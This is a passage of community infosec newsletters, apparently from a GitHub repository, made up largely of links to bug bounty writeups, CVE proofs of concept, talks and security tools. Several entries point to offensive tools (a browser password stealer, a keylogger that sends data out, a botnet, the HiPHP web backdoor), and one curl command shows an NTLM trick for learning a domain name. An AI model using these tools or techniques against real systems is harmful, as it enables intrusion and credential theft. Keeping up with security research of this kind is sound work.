analysis**\n *CVE's Week 02 -> 9 - 16 Aug 2022* \n - https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md\n\n - Micosoft security CVE's, Cisco CVE, Winder Server, Virtual Studio Code, VMware , Web admin, CVE-2022-31101 POC , CVE-2022-33980 etc.\n\n### Vulenrabilty/bugs Reoprts, vulnerability Writeups and Anlalysis**\n\n *Hackerone Report Segment:*\n \n - [$2900 - Improper Authentication : Admin panel Exposure without credential at https://plus-website.shopifycloud.com/admin.php](https://hackerone.com/reports/1417288)\n - [$2500 - Code Injection (Kubernetes): Ingress-nginx annotation injection allows retrieval of ingress-nginx serviceaccount token and secrets across all namespaces](https://hackerone.com/reports/1378175)\n - [$2400 - Improper Authentication : Disabling context isolation, nodeIntegrationInSubFrames using an unauthorised frame.](https://hackerone.com/reports/1417288)\n - [$500 - Improper Authentication : Many commands can be manipulated to delete identities or affiliations](https://hackerone.com/reports/348090)\n\n\n *Bugs Analysis and Writeups segment:* \n - [SSRF bypass list in 2022](https://pastebin.com/YbsKrMpf)\n - [DefCon30 - Finding security vulnerabilities through fuzzing](http://fuzzing.in/codelabs/finding_security_vulnerabilities/index.html?index=..%2F..index#0)\n - [Email Confirmation bypass at Instagram(meta)](https://medium.com/@avinash_/email-confirmation-bypass-at-instagram-cc968f9a126)\n - [How I earned a $6000 bug bounty from Cloudflare](https://deb0con.medium.com/how-i-earned-a-6000-bug-bounty-from-cloudflare-db6949e39cf7)\n - [How I earned a $7000 bug bounty from Grab (RCE Unique Bugs)](https://deb0con.medium.com/how-i-earned-a-7000-bug-bounty-from-grab-rce-unique-bugs-5e5037c5a58d)\n - [Process injection: breaking all macOS security layers with a single vulnerability](https://sector7.computest.nl/post/2022-08-process-injection-breaking-all-macos-security-layers-with-a-single-vulnerability/)\n - [Local priv-esc vulnerability in Zoom (for macOS)](https://speakerdeck.com/patrickwardle/youre-muted-rooted)\n - [Google Cloud Shell - Command Injection](https://bugra.ninja/posts/cloudshell-command-injection/)\n - [Discord Desktop - Remote Code Execution](https://blog.electrovolt.io/posts/discord-rce/)\n - [Liferay revisited: A tale of 20000$](https://vsrc.vng.com.vn/blog/liferay-revisited-a-tale-of-20k/)\n - [Ever Hacked Nginx? Well, now you can by reading this amazing article by Manas Harsh.](https://infosecwriteups.com/hacking-nginx-best-ways-7c576cc17ccc)\n - [Find how Sivanesh Ashok and his friend were able to steal Google Drive OAuth tokens from Dropbox.](https://blog.stazot.com/stealing-google-drive-oauth-tokens-from-dropbox/)\n - [Read about sharepoint API misconfigurations here in this interesting article by Ujjaval Malhotra.](https://medium.com/@ujmalhotra95/tales-of-sharepoint-api-misconfigurations-11073ad384fd)\n - [Bypassed Cloudflare’s Web Application Firewall (WAF)](https://medium.com/@the_harvester/bypassed-cloudflares-web-application-firewall-waf-44da57f3a1d3)\n - [How I learned that some bugs are truly rare or Salesforce bug hunting to Critical bug](https://infosecwriteups.com/salesforce-bug-hunting-to-critical-bug-b5da44789d3)\n - [Writeup on several major vulnerabilities in Centos Web Panel](https://www.immersivelabs.com/blog/we-discovered-major-vulnerabilities-in-control-web-panel-heres-how-we-found-them/)\n - [From Shodan to RCE: That one time I hacked a Fortune 500 company.](https://systemweakness.com/rooting-jenkins-remote-code-execution-on-a-live-bug-bounty-target-fc2c12d89a2e)\n - [Business Logic Vulnerability via IDOR](https://sagarsajeev.medium.com/business-logic-vulnerability-via-idor-6d510f1caea9)\n - [Internal Bug Bounty’s & The Importance of Timing](https://medium.com/@tankSOC/internal-bug-bountys-the-importance-of-timing-f9aee5afa9d8)\n - [Top 5 Security Issue with COOKIES](https://0xshakhawat.medium.com/top-5-security-issue-with-cookies-54c18ae71f98)\n - [My pentest Log by hcibo 1-22](https://hcibo.medium.com/)\n - [Bug bounty resources - Notion Notes](https://jeweled-lathe-d5e.notion.site/Resources-For-Bug-Bounty-14abca4df5be40838df4689afb384388)\n\n\n### Research Article/Whitepaper & Statistics Reports**\n- Quarterly Adversarial Threat Report Q2 2022. - https://drive.google.com/file/d/1VaezIySG295MxX0njgb-EZm5oRvueIsk/view?usp=sharing\n- The DFIR Report : 2021 Real Intrusions recap - https://thedfirreport.com/2022/03/07/2021-year-in-review/\n- Code Review Checklist - https://drive.google.com/file/d/183yB8v-TivlrEQ3oe-p953J45mh1R2DG/view?usp=sharing\n- How Leaked Twitter API Keys Can be Used to Build a Bot Army - https://drive.google.com/file/d/19qUBeq7jGaxP1kWBGaH1XPA6ZbsCpisAG/view?usp=sharing\n\n - Detecting DNS implants: Old kitten, new tricks – A Saitama Case Study - https://research.nccgroup.com/2022/08/11/detecting-dns-implants-old-kitten-new-tricks-a-saitama-case-study/\n - Security Implications of URL Parsing Differentials - https://blog.sonarsource.com/security-implications-of-url-parsing-differentials/\n - Progresql vulnerability in cloud services. - https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities\n - Enhancing Subdomain Enumeration - ENTs and NOERROR - https://www.securesystems.de/blog/enhancing-subdomain-enumeration-ents-and-noerror/\n - How Cisco got hacked - insights on what the attackers did - https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html\n - The Cisco Hack - Learning from the Cisco Hack, Trail of Evidence Found in Logs - https://trunc.org/learning/cisco-hack-tracks-left-in-the-logs\n - Security Best Practices in PHP - https://sweetcode.io/security-best-practices-in-php/\n - How useful is CVSS Score in CVE triage - The CVSS who cried wolf — Vulnerabilities Exploitation data Check - https://inthewild.io/blog/how-useful-is-cvss-score-in-CVE-triage\n - Security Guide for Startups: How to think about security while moving quickly | LunaSec - https://www.lunasec.io/docs/blog/security-guide-for-startups/\n - Germany to mandate minimum security standards for web browsers in government - https://portswigger.net/daily-swig/germany-to-mandate-minimum-security-standards-for-web-browsers-in-government\n - Continue on : ### Secuirty and Researchers: Pentesting, Red, blue, Threat inteligence, SOC, Ransomeware etc**\n\n### Twitter thread** \n - Best SSRF 2022 - https://twitter.com/0dayCTF/status/1556279777455386627 - \n - Checkout this thread to find how @0xmahmoudJo0 was able to access a target’s admin panel. - https://twitter.com/0xmahmoudJo0/status/1533402992212430849\n - @0xConda 1st month doing bug bounty and getting to top 100 of all time leaderboard on Intigriti. - https://twitter.com/0xConda/status/1534868739652476928?t=g8zCgwd5nnMiPOcstgOC9A&s=19\n - @_zwink once again does what he’s extremely good at (find out by clicking here). - https://twitter.com/_zwink/status/1534605203441188865?t=O8XajIEZc6zWBZJDqMmx_Q&s=19\n\n\n### Tools, rat's and Ransomware**\n - List of Blackhat arsenal tool(since its inception in 2011) - https://github.com/toolswatch/blackhat-arsenal-tools\n - BlueHound is an open-source tool that helps blue teams pinpoint the security issues that actually matter - https://github.com/zeronetworks/BlueHound\n - Codewarrior - open source SAST - https://github.com/CoolerVoid/codewarrior\n - Packj: Flags malicious/risky open-source packages. - https://github.com/ossillate-inc/packj\n - [DefectDojo : DevSecOps](https://www.defectdojo.com/) is a security orchestration and vulnerability management platform. - https://github.com/DefectDojo/django-DefectDojo \n - ocsf-schema : Open Cybersecurity Schema Framework - https://github.com/ocsf/ocsf-schema\n - WebRecon : A collection of pentesting tools that perform vulnerability scans websites. - https://github.com/flashnuke/WebRecon\n - Kharma: A new grammar-based fuzzer - https://github.com/Rog3rSm1th/kharma\n - Agnee : Find sensitive information using dorks from different search-engines. - https://github.com/R0X4R/Agnee\n - Gorilla tool generating wordlists or extending an existing one using mutations. - https://github.com/d4rckh/gorilla\n - An Automated Mass Network Vulnerability Scanner and Recon Tool - https://github.com/whitehatsoumya/Nutoscan\n - JF⚡can - Super fast port scanning & service discovery using Masscan and Nmap. Scan large networks with Masscan and use Nmap's scripting abilities to discover information about services. Generate report. - https://github.com/nullt3r/jfscan\n - AWSGoat is a vulnerable by design infrastructure on AWS featuring the latest released OWASP Top 10 web application security risks (2021) and other misconfigured AWS services. - https://github.com/ine-labs/AWSGoat\n - Launch HTTP Request Smuggler(not be confused with Burp Suite HTTP Smuggler (https://github.com/nccgroup/BurpSuiteHTTPSmuggler), which uses similar techniques but is focused exclusively bypassing WAFs. - https://github.com/portswigger/http-request-smuggler)\n - zathura - a highly customizable and functional document viewer - https://github.com/pwmt/zathura\n - DotDumper : An automatic unpacker and logger for DotNet Framework targeting files! This tool has been unveiled at Black Hat USA 2022 (https://www.blackhat.com/us-22/arsenal/schedule/index.html#dotdumper-automatically-unpacking-dotnet-based-malware-27846). - https://github.com/advanced-threat-research/DotDumper\n- ParamChanger : tool allowing you to replace the parameters of a list of urls by a payload entered as an argument. - https://github.com/mathis2001/ParamChanger\n- Aline : OSINT tool that simply downloads files of a certain type, located on a certain domain and indexed by Google. - https://github.com/ferreiraklet/Aline\n- An OSINT tool to search for accounts by username in social networks. - https://github.com/p1ngul1n0/blackbird\n- Burp2Malleable that turn HTTP requests from BurpSite into Cobalt Strike Malleable C2 profiles. - https://github.com/CodeXTF2/Burp2Malleable\n- chrome_password : Steal Get username & password from Chrome. (Now Only Windows) - https://github.com/justjavac/chrome_password.js\n- BadBlood by Secframe fills a Microsoft Active Directory Domain with a structure and thousands of objects. - https://github.com/davidprowe/BadBlood\n- python-keylogger : Simple Python Keylogger with Pynput Sending data to a server - https://github.com/davidbombal/python-keylogger\n\n### Secuirty and Researchers: Pentesting, Red, blue, Threat inteligence, SOC, Ransomeware etc**\n- WiFi Standard 802.11ac Packet Analysis - https://tbhaxor.com/wifi-standard-80211ac-packet-analysis/\n- What Happened to Lapsus$ - https://coderoasis.com/what-happened-to-lapsus/\n- Starlink Successfully Hacked Using $25 Modchip - https://threatpost.com/starlink-hack/180389/\n- How hackers hack Starlink - https://github.com/KULeuven-COSIC/Starlink-FI\n- Maui Ransomeware - https://securityaffairs.co/wordpress/134195/malware/maui-ransomware-andariel-apt.html\n- Tecchnical analysis of inductrial Spy Ransomeware - https://www.zscaler.com/blogs/security-research/technical-analysis-industrial-spy-ransomware\n- How to securely confine the zathura application to a SELinux domain. - https://blog.esp0x31.io/zathura-selinux-confined/\n- iOS Privacy: Instagram and Facebook can track anything you do on any website in their in-app browser - https://krausefx.com/blog/ios-privacy-instagram-and-facebook-can-track-anything-you-do-on-any-website-in-their-in-app-browser?s=09\n- The quantum state of Linux kernel garbage collection CVE-2021-0920 (Part I) - https://googleprojectzero.blogspot.com/2022/08/the-quantum-state-of-linux-kernel.html\n- [Dancing on the architecture of VMware Workspace ONE Access](https://petrusviet.medium.com/dancing-on-the-architecture-of-vmware-workspace-one-access-eng-ad592ae1b6dd)\n- Analysis of Dark Web service offerings, lnk delivery patterns & detection opportunities, and more - https://opalsec.substack.com/p/soc-goulash-weekend-wrap-up-285\n- Advisory: Cisco Small Business RV Series Routers Web Filter Database Update Command Injection Vulnerability - https://onekey.com/blog/advisory-cisco-small-business-rv-series-routers-web-filter-database-update-command-injection-vulnerability/\n- Wifi Traffic Analysis in Wireshark - https://tbhaxor.com/wifi-traffic-analysis-in-wireshark/\n- From Shared Dash to Root Bash :: Pre-Authenticated RCE in VMWare vRealize Operations Manager - https://srcincite.io/blog/2022/08/09/from-shared-dash-to-root-bash-pre-authenticated-rce-in-vmware-vrealize-operations-manager.html\n- IAM Whoever I Say IAM :: Infiltrating VMWare Workspace ONE Access Using a 0-Click Exploit - https://srcincite.io/blog/2022/08/11/i-am-whoever-i-say-i-am-infiltrating-vmware-workspace-one-access-using-a-0-click-exploit.html\n- BumbleBee(Malware loader) Roasts Its Way to Domain Admin - https://thedfirreport.com/2022/08/08/bumblebee-roasts-its-way-to-domain-admin/\n- Concealed code execution: Techniques and detection used by APTs to execute code mostly on Windows systems - https://www.huntandhackett.com/blog/concealed-code-execution-techniques-and-detection)\n- HijackLibs: an open-source, community-driven project tracking DLL Hijacking opportunities in in Windows - https://hijacklibs.net/\n- LibAFL: A Framework to Build Modular and Reusable Fuzzers - https://www.s3.eurecom.fr/docs/ccs22_fioraldi.pdf\n- capa v4: casting a wider .NET - https://www.mandiant.com/resources/capa-v4-casting-wider-net\n- ATT&CK + D3FEND = D.E.A.T.H - https://fourcore.io/blogs/mitre-attack-mitre-defend-detection-engineering-threat-hunting\n\n### Red Team \n- Useful redteam github links\n - https://github.com/A0RX/Red-Blueteam-party\n - https://github.com/MantisSTS/RedTeamTools\n - https://github.com/idchoppers/redTeaming\n - https://github.com/irredteam/irredteam.github.io\n - https://github.com/0xMrNiko/Awesome-Red-Teaming\n - https://github.com/J0hnbX/RedTeam-Resources \n - https://github.com/dmcxblue/dmcxblue.github.io\n\n### Volunteer Opportunities :\n\n If you want to get involved in making **Weekly Cybersecurity Update** a better, but aren't sure how.\n CONTACT \"@Attr1b\" on Telegram or mail us to \"resethackerofficial@gmail.com\" \n \n Please write a reason How do you plan to improve it?\n \n### [SOURCE for Weekly infosec Update:](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md)\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_03.md", "content": " #### Hey Hackers, I hope you’ve been doing well! \n Here are the Agenda for \"Weekly infosec Update\" 03 (16th - 22nd Aug 2022): \n\n \n\n#### Remember to support us by contributing to repository and giving a Star. \n#### Supported By - [ResetHacker Community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty) and BugBountyTips.Tech.\n- Contributors : - Vikram, Paul miller, Tarang Parmar\n\nLet's start the Week recap,\n\n### Hiring & Free course**\n\n- [Hiring/Jobs Opening week 04 : Aug 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022)\n- [Interview Questions](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md)\n\n### Events, Talks & Webinars**\n\n - DEFCON workshop : Hacking APIs Presentation notes from Corey Ball’s - https://sway.office.com/HVrL2AXUlWGNDHqy\n - Black Hat talk : Victoria Ontiveros and Tarah Wheeler gave a Talk - [How to Stand Up a Major Cyber Incident Investigations Board and how a process could be applied to cyber incident investigations.](https://github.com/tarahmarie/investigations/blob/main/playbook.md)\n - [Black Hat talk by NCC Group’s Iain Smart and Viktor Gazdag where he discuss RCE-as-a-Service: Lessons Learned from 5 Years of Real-World CI/CD Pipeline Compromise abstract ](https://www.blackhat.com/us-22/briefings/schedule/index.html#rce-as-a-service-lessons-learned-from--years-of-real-world-cicd-pipeline-compromise-27541)\n - [Black Hat USA 2022 : Controlling the Source: Abusing Source Code Management Systems](https://securityintelligence.com/posts/abusing-source-code-management-systems/)\n IBM X-Force Red’s Brett Hawkins on material he presented at Black Hat USA 2022 (whitepaper). He discusses attack scenarios for GitHub Enterprise, GitLab Enterprise, and Bitbucket, including reconnaissance, manipulation of user roles, repository takeover, pivoting to other DevOps systems, user impersonation, and maintaining persistent access. Brett also released a tool: [SCMKit - Source Code Management Attack Toolkit ](https://github.com/xforcered/SCMKit).\n\n - [Red Teaming TTPs // Developing a POC for CVE-2022-26923 with Powershell and CommandoVM](https://youtu.be/z86tfhMU_vU) \n - [Snyff Talks About Hacking, Learning and Creating PentesterLab!](https://www.youtube.com/watch?v=XaLA5yqvKN8)\n - [Portable DIY Raspberry Pi Thermal Camera + Fingerprint Decoder Algorithm Teaser](https://www.youtube.com/watch?v=ZDRz1PYWp94)\n\n### Cve's POC and analysis**\n\n *CVE's Week 02 -> 9 - 16 Aug 2022* \n - https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/CVE's/Readme.md\n \n - CVE-2022-1802 POC Exploit, CVE-2022-21881 POC , cve-2022-37393 Analysis, CVE-2022-36966, 1day to 0day(CVE-2022-30024) on TP-Link TL-WR841N, CVE-2020-6369 Patch bypass, CVE-2022-35742 Analysis (Window outlook), CVE-2020-6369 Patch bypass and CVE-2022-29805 Analysis. \n - Nuclei Zimbra: Release of CVE-2022-37042 Zimbra Authentication Bypass Causing RCE Non-Destructive Vulnerability Detection Template.\n - Sysax-multi-server-ssh-username-exploit\n - K8tools - K8 tool collection.\n\n### Vulenrabilty/bugs Reoprts, vulnerability Writeups and Anlalysis**\n\n *Hackerone/Bugcrowd Report Segment:*\n \n - [$4,617.00 Delimiter injection in GitHub Actions \"core.exportVariable\" function](https://hackerone.com/reports/1625652)\n - [Passing a large list of amounts to the get_output_distribution call crashes a remote node, after maybe 90 seconds of keeping it busy.](https://hackerone.com/reports/1379707)\n - [$6200 Critical Local File Read in Electron Desktop App](https://bugcrowd.com/disclosures/f7ce8504-0152-483b-bbf3-fb9b759f9f89/critical-local-file-read-in-electron-desktop-app)\n\n \n *Bugs Analysis and Writeups segment:* \n - [$100,000 Attacking the Mozilla Firefox Renderer : Browser bug, RCE (Part 1)](https://www.zerodayinitiative.com/blog/2022/8/17/but-you-told-me-you-were-safe-attacking-the-mozilla-firefox-renderer-part-1)\n - [$30,000 Reward from Microsoft : Let's Dance in the Cache - Destabilizing Hash Table on Microsoft IIS! (DoS, Web cache poisoning, Authentication bypass)](https://blog.orange.tw/2022/08/lets-dance-in-the-cache-destabilizing-hash-table-on-microsoft-iis.html)\n - [Account takeover worth $1000 using misconfigured 2FA and OAuth.](https://infosecwriteups.com/account-takeover-worth-1000-611452063cf)\n - [Vulnerability in the enforcement of group permissions in Linux containers (Docker, Kubernetes, etc.)](https://www.benthamsgaze.org/2022/08/22/vulnerability-in-linux-containers-investigation-and-mitigation/)\n - [Ridiculous vulnerability disclosure process with CrowdStrike Falcon Sensor.](https://www.modzero.com/modlog/archives/2022/08/22/ridiculous_vulnerability_disclosure_process_with_crowdstrike_falcon_sensor/index.html)\n - [Hacking BeReal - A practical lesson on “Man in the Middle” attacks](https://blog.oscars.dev/posts/hacking_bereal_with_man_in_the_middle)\n - [About Jenkins tokens](https://www.errno.fr/JenkinsTokens.html)\n\n\n### Twitter thread**\n\n - [Cybersecurity Jobs at Twitter](https://twitter.com/LeaKissner/status/1560352231047569408?s=20&t=vvNxiqtIqd5KP1Vf7WlSVA)\n - [InsiderPHP approch on H1-702 targets where she live tweeted her process 👇](https://twitter.com/insiderphd/status/1552574912719618048?s=21&t=fct3KWsYeXMAGM3FgTIEaw)\n - [Signal says that it's one of the 125 customers impacted in the Twilio breach from earlier this month:](https://support.signal.org/hc/en-us/articles/8BQAzQwVETtFWGmAFZjAwNSYA7M4EczfocpPa2kZ6AiC1tVQuAhJTRjLG5Nkk4QqFWHxiKBdi6RuUFjC5zMhvhUyK7tatMA/status/1559221383107854336?s=21)\n - [See what JavaScript commands are injected into the program through the browser.👀 Tik Tok, when opening any website in its program, injects its own code that can monitor all keys that are typed, including passwords, and all other types.](https://twitter.com/KrauseFx/status/1560370732705742848?s=20&t=D6Wi--gvYqSvFAzulJ8qRw)\n \n### Research Article/Whitepaper & Statistics Reports**\n \n - BlackHat : NTLM relay is dead and living in AAD - https://i.blackhat.com/USA-22/Wednesday/US-22-Rubin-AAD-Joined-Machines-New-Lateral-Movement.pdf\n - Code Review Checklist - https://drive.google.com/file/d/183yB8v-TivlrEQ3oe-p953J45mh1R2DG/view?usp=sharing\n - A Lightweight Approach To Implement Secure Software Development LifeCycle (Secure SDLC) - https://www.anshumanbhartiya.com/posts/secure-sdlc\n - [Hacking Together an ASM Platform Using ProjectDiscovery Tools](https://blog.projectdiscovery.io/asm-platform-using-projectdiscovery-tools/)\n - [Building Your Own Historical DNS Solution with DNSx](https://blog.projectdiscovery.io/building-your-own-historical-dns-solution-with-dnsx/)\n - [Enhanced With AWS san Intigration. ](https://blog.rewanthtammana.com/trivy-enhanced-with-aws-scan-integration)\n \n - Continue on : ### Secuirty and Researchers: Pentesting, Red, blue, Threat inteligence, SOC, Ransomeware etc**\n\n\n### [Tools: OSINT, Pentesting, Blue/Red team, Rat, Ransomware etc**]\n[TOOLS WE'RE ADDING THIS WEEK:](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/Tools/Readme.md)\n\n - SAAS/PASS/Recon/Exploit Web :\n \n - Lazyparam - A simple automation tool to detect LFI, RCE, and SSTI vulnerability\n - FindFrontableDomains - Search for potential frontable domains. FindFrontableDomains Tool is based on information found here: https://www.bamsoftware.com/papers/fronting/\n - goSqlite_gorm - golang,Penetration, Attack, Auxiliary Tool, tnb = tree new bee\n - Serein_Linux - 【Lazy Artifact】A graphical tool that collects urls in batches, and performs various nday detections on the collected urls in batches. It can be used for src mining, cnvd mining, 0day exploitation, building your own arsenal and other scenarios.\n - HiPHP - BackDoor to control php-based sites. : A BackDoor to control php-based sites hiphp can be controlled by sending commands, files, and tokens to the site using the http/https protocol. After copying the HIPHP_HOLE_CODE and placing it in any php file on the target website, you will have permissions to enter it, read all files, delete and even upload new files to it. Also, this back door is password protected.\n - SCMKit v1 - Source Code Management Attack Toolkit can be use to attack SCM systems.\n\n - *Cloud Security :*\n \n - Assisted Log Enabler for AWS - Find AWS resources that are not logging, and turn them on.\n\n - *Blue Team Tools :*\n \n - BlueHound - open-source tool that helps blue teams pinpoint the security issues that actually matter.\n - Matos : An open-source cloud security tool for analyzing multi-cloud infrastructure security.\n - Siembol : An open-source, real-time Security Information & Event Management tool based on big data technologies, providing a scalable, advanced security analytics framework. Siembol provides a scalable, advanced security analytics framework based on open-source big data technologies. Siembol normalizes, enriches, and alerts on data from various sources, which allows security teams to respond to attacks before they become incidents. \n - Sauron is a minimalistic cross-platform malware scanner with non-blocking realtime filesystem monitoring using YARA rules, written in Rust.\n - *Malware Analysis :* \n \n - PortEx - Java library for static malware analysis of Portable Executable files\n \n - *OSINT Tools :*\n \n - Yagooglesearch(Yet Another Google Seatch #python library) : \"Simulates real human Google search behavior to prevent rate limiting by Google and if HTTP 429 blocked by Google, logic to back off and continue trying\" (c) \n - PyTrends : Simple #python library for automatically collecting data from Google Trends.For example, you can find out what queries users enter with a certain keyword(including historical and regional data).\n - Email-header-analyzer\n \n - Ntml Auth Trick : Determining AD domain name via NTLM Auth\n\n If you have nmap (http-ntlm-info) unable to determine the FQND of an Active Directory domain via OWA, for example due to Citrix NetScaler or other SSO solutions, do it manually!\n\n 1. curl -I -k -X POST -H 'Authorization: NTLM TlRMTVNTUAABAAAAB4IIogAAAAAAAAAAAAAAAAAAAAAKANc6AAAADw==' -H 'Content-Length: 0' https://autodiscover.exmaple.com/ews\n 2. echo 'TlRMTVNTUAACAAAADAAMAD...' | python2 ./ntlmdecoder.py\n https://gist.github.com/aseering/829a2270b72345a1dc42\n\n### Secuirty and Researchers: Pentesting, Red, blue, Threat inteligence, SOC, Ransomeware etc**\n\n- *Misc :*\n - Spammers use Google Translate to bypass Domain-Blacklists - https://certitude.consulting/blog/en/bypass-phishing-detections-with-google-translate-2/\n - BlaackHat: Return to Sender - Detecting Kernel Exploits with eBPF - https://i.blackhat.com/USA-22/Wednesday/US-22-Fournier-Return-To-Sender.pdf\n - Search result are getting restricted after certain pages. - https://youtu.be/8O_NvPpbsbw\n - New USB Rubber Ducky runs its own structured programming language - https://www.theverge.com/23308394/usb-rubber-ducky-review-hack5-defcon-duckyscript\n - DEFCON: How US Teen Rickrolled His High School District - https://www.infosecurity-magazine.com/news/defcon-how-us-teen-rickrolled/\n - malwareDev: Many applications appear to rely on Environment Variables such as %SYSTEMROOT% to load DLLs from protected locations. By changing these variables on process level, it is possible to let a legitimate program load arbitrary DLLs. - https://github.com/wietze/windows-dll-env-hijacking\n - Research: https://www.wietzebeukema.nl/blog/save-the-environment-variables\n - Pitraix Botnet - Modern P2P Self-Modifying Botnet Cross-Platform Over TOR - https://github.com/ThrillQuks/Pitraix\n - Sysmon 14.0 : File block Execution - https://medium.com/@olafhartong/sysmon-14-0-fileblockexecutable-13d7ba3dff3e\n - Detection Engineering with MITRE Top Techniques & Atomic Red Team - FourCore - https://fourcore.io/blogs/detection-engineering-with-mitre-engenuity-atomic-red-team\n - Splunk Security Essentials Docs - https://docs.splunksecurityessentials.com/content-detail/\n - Introducing the new AWS Serverless Snippets Collection - https://aws.amazon.com/blogs/compute/introducing-the-new-aws-serverless-snippets-collection/\n\n- *Blue/Purple Team :*\n - 💙Blue Team Cheatsheets - https://github.com/chrisjd20\n - [Open Cybersecurity Schema Framework](https://github.com/ocsf)\nA proposed standard (whitepaper) for sharing security information. By standardizing alerts and logs from various tools, data scientists and analysts can work with a common language for threat detection and investigation. Companies involved include: Amazon, Splunk, IBM, Crowdstrike, Rapid7, Palo Alto, and Cloudflare.\n - [Introducing Threatest, a Go framework for end-to-end testing of threat detection rules](https://securitylabs.datadoghq.com/articles/threatest-end-to-end-testing-threat-detection/)\nThreatest allows you to define scenarios where you detonate an attack technique (over SSH or using Stratus Red Team), then assert that an alert was produced on a third-party platform.\n - [Applied Purple Teaming - Infrastructure, Threat Optics, and Continuous Improvement](https://github.com/DefensiveOrigins/APT06202001/tree/master/Lab-Build-PreReq)\n\n### BlackHat Hacker News:\n - AWAE OSWE Exam Writeup July 2022 has been leaked.(Source : Unknown)\n - 🔴 The Clop ransomware group claimed that it was able to break into Thames Water's industrial control systems and steal 5 terabytes of data, but did not encrypt any data, and although it could change the chemical percentage of water and affect 15 million British people, this It did not work and this company informed about this vulnerability. But the company has denied this claim.\n\n Further, this ransomware group has published part of the data to prove that by checking it, they realized that this group did not hack Thames Water and in fact they hacked South Staffordshire Water, which of course this company confirmed this hack. (Part of the data is the username and password that belong to this company, i.e. South-Staffs-Water.co.uk@*)\n\n Based on this, there are two possibilities, either this group's goal is to misidentify or they want to extort money from a big company with the information of this small company.\n\n Given that Britain is in a drought period and has implemented water rationing policies, the choice of such targets on the part of the attackers can be done to exert pressure to pay the ransom, which is conceivable.\n\n\n### How to get involve in Contribution? :\n\n If you want to get involved in making **Weekly Cybersecurity Update** a better, but aren't sure how.\n CONTACT \"@Attr1b\" on Telegram or mail us to \"resethackerofficial@gmail.com\" \n \n Please write a reason, How do you plan to improve it?\n \n### [SOURCE for Weekly infosec Update:](https://github.com/RESETHACKER-COMMUNITY/Community-Contributers/blob/main/StayUptoDate.md)\n\n### Wrapping Up\n\n Have questions, Suggestions, or feedback? Just reply directly to mail, I'd love to hear from you.\n\n If you find this newsletter useful and know other people who would too, I'd really appreciate if you'd forward it to them 🙏\n\n Thanks for reading!\n

\"RESETHACKER-COMMUNITY\"

\n" }, { "path": "ResetCybersecuirty/Weekly_Infosec_Update(WIU)/Weekly_Infosec_Update_04.md", "content": " #### Hey Hackers, I hope you’ve been doing well! \n Here are the Agenda for \"Weekly infosec Update\" 04 (23rd - 30th Aug 2022) \n \n![](https://img.shields.io/github/issues/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/forks/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/stars/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n![](https://img.shields.io/github/last-commit/RESETHACKER-COMMUNITY/Pentesting-Bugbounty)\n

\"Pentesting-Bugbounty//ResetCybersecuirty/\"

\n\n \n\n---\n\n#### We started working on \"Weekly Infosec Update\" because It's very time consuming to monitor the InfoSec Community on twitter, telegram, reddit. discord and visiting security website every day. \nWe had no idea we’d end up releasing \"Weekly Infosec Update\" every Wednesday. Huge thanks to our awesome [Community Leader to contribution and giving back to community](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/ResetCybersecuirty/SupportedBy/Team%26Contributors.md) and thankyou for being the part of team.\n\nContributors : - Good Resources Share, Paul miller, [Tarang Parmar](https://github.com/TarangParmar), [Tuhin Bose](https://github.com/tuhin1729), Vikram and Alexandre ZANNI ([@noraj](https://github.com/noraj) Github Moderator).\n\n---\n\n### Let's start the Week recap, and my apology for So much Info. We're finding a way to make it shorter.\n\n### 🏛️🏛️🏛️ HIRING, WORKSHOP & TRAINNING 🏛️🏛️🏛️\n\n**Here we talk about and share resources related to Jobs, Ongoing Workshop and free trainning offered by organization, community and leader.**\n\n1. Let's Talk about [Internship/Job Opening in Aug 2022](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/Jobs.md#Weekly-Cybersecurity-Hiring-Aug-2022).\n\n2. Here We have collected [Interview Questions asked by organization while Hiring](https://github.com/RESETHACKER-COMMUNITY/Pentesting-Bugbounty/blob/main/CyberSecurityJobs/InterviewQA.md).\n\n3. Free SANS Workshop: [Building an Azure Pentest Lab for Red Teams](https://www.sans.org/webcasts/sans-workshop-building-azure-pentest-lab-red-teams/)\n\n### 📆📆📆 EVENTS, TALKS & WEBINAR 📆📆📆\n\n**This Week Defcon, BlackHat and Liran Tal talk from JSDayCAN22 was mainly trending in infosec community so We have filtered important Talk, Slides, Tools, Weekly Podcast, Youtube Videos and resources releted to Events, Talks & Webinars.**\n\n - In case you're still strugling with finding [Blackhat 2022 all the slides](https://drive.google.com/drive/mobile/folders/1KHx2rKUEdb53flGUN0mFHRdSdB5PUT4B?fbclid=IwAR1C2Fk3XDPU-ky-4B57ZmKtEKgjB6Yg-9m2c6MTxyJd779yPV7MCCHCvWo&fs=e&s=c). This drive have it all. Enjoy :)\n\n - In BlackHat USA 2022, markakd talked about [DirtyCred - A New Exploitation Method! No Pipe but as Nasty as Dirty Pipe](https://github.com/markakd/DirtyCred)\n\n - This article is the “text notes” version of @spaceraccoon talk at DEF CON 30 Cloud Village. [Exploiting Improper Validation of Amazon Simple Notification Service SigningCertUrl](https://spaceraccoon.dev/exploiting-improper-validation-amazon-simple-notification-service/) - The talk was not recorded so this is the only public version of it.\n\n - [How React Applications Get Hacked in the Real-World – Liran Tal](https://youtu.be/f16lELnFTNI) : [Slide](https://slides-react-security-lightning-talk-2022.vercel.app/1) -> By using React we are completely safe when it comes to 